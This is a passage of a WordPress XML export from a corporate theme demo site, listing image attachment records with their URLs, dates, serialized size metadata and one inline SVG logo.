		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1386</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 03:49:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 03:49:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:567;s:4:"file";s:21:"2020/10/bg2-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg2-home2-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home2-1024x302.jpg";s:5:"width";i:1024;s:6:"height";i:302;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home2-768x227.jpg";s:5:"width";i:768;s:6:"height";i:227;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home2-1536x454.jpg";s:5:"width";i:1536;s:6:"height";i:454;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x567.jpg";s:5:"width";i:600;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/image1-home2/</link>
		<pubDate>Wed, 21 Oct 2020 07:37:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1401</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 07:37:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 07:37:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/image1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:492;s:4:"file";s:24:"2020/10/image1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"image1-home2-300x77.jpg";s:5:"width";i:300;s:6:"height";i:77;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"image1-home2-1024x262.jpg";s:5:"width";i:1024;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image1-home2-768x197.jpg";s:5:"width";i:768;s:6:"height";i:197;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"image1-home2-1536x394.jpg";s:5:"width";i:1536;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x492.jpg";s:5:"width";i:600;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/bg3-home2/</link>
		<pubDate>Wed, 21 Oct 2020 08:04:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1406</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 08:04:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 08:04:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/10/bg3-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-home2-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-home2-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-home2-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-home2-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/image1-home3/</link>
		<pubDate>Tue, 03 Nov 2020 10:23:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1607</wp:post_id>
		<wp:post_date><![CDATA[2020-11-03 10:23:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-03 10:23:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image1-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:570;s:6:"height";i:430;s:4:"file";s:24:"2020/11/image1-home3.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-home3-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home3-570x400.jpg";s:5:"width";i:570;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Full_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-mobile/04_full_white/</link>
		<pubDate>Mon, 09 Nov 2020 04:47:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1776</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:47:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:47:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_full_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>77</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/05/04_Full_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st0" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st0" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st0" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st0" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st0" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st0" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st0" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-banner-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/image-banner-home4/</link>
		<pubDate>Tue, 10 Nov 2020 10:42:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-banner-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1819</wp:post_id>
		<wp:post_date><![CDATA[2020-11-10 10:42:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-10 10:42:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-banner-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-banner-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image-banner-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:780;s:4:"file";s:30:"2020/11/image-banner-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:30:"image-banner-home4-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"image-banner-home4-1024x416.jpg";s:5:"width";i:1024;s:6:"height";i:416;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"image-banner-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"image-banner-home4-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"image-banner-home4-1536x624.jpg";s:5:"width";i:1536;s:6:"height";i:624;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"image-banner-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"image-banner-home4-1200x780.jpg";s:5:"width";i:1200;s:6:"height";i:780;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/image2-home4/</link>
		<pubDate>Wed, 11 Nov 2020 03:53:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1831</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 03:53:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 03:53:15]]></wp:post_date_gmt>
